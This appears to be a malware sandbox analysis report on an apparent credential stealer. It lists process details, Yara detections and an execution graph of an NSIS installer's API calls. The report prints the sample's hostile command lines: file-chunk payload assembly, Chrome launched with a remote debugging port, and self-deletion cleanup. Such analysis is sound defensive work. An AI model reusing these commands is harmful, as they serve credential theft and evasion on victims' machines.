                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u
                                                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                                                          Start time:14:47:03
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:Corrections.com u
                                                                                                                                                                                                                                                                                          Imagebase:0x920000
                                                                                                                                                                                                                                                                                          File size:947'288 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2823074845.0000000004CCA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2823074845.0000000004D99000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                                          Start time:14:47:04
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                          Imagebase:0x430000
                                                                                                                                                                                                                                                                                          File size:28'160 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                                                                          Start time:14:47:20
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                                                          Start time:14:47:40
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                                          Start time:14:47:41
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2136,i,3268982340233252329,5354050458271203649,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                                                          Start time:14:48:52
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\628056\Corrections.com" & rd /s /q "C:\ProgramData\2N7Y58YCJW47" & exit
                                                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                                                          Start time:14:48:52
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                                                          Start time:14:48:52
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                          Imagebase:0x6f0000
                                                                                                                                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                            Execution Coverage:17.7%
                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                            Signature Coverage:21%
                                                                                                                                                                                                                                                                                            Total number of Nodes:1482
                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:27
                                                                                                                                                                                                                                                                                            execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 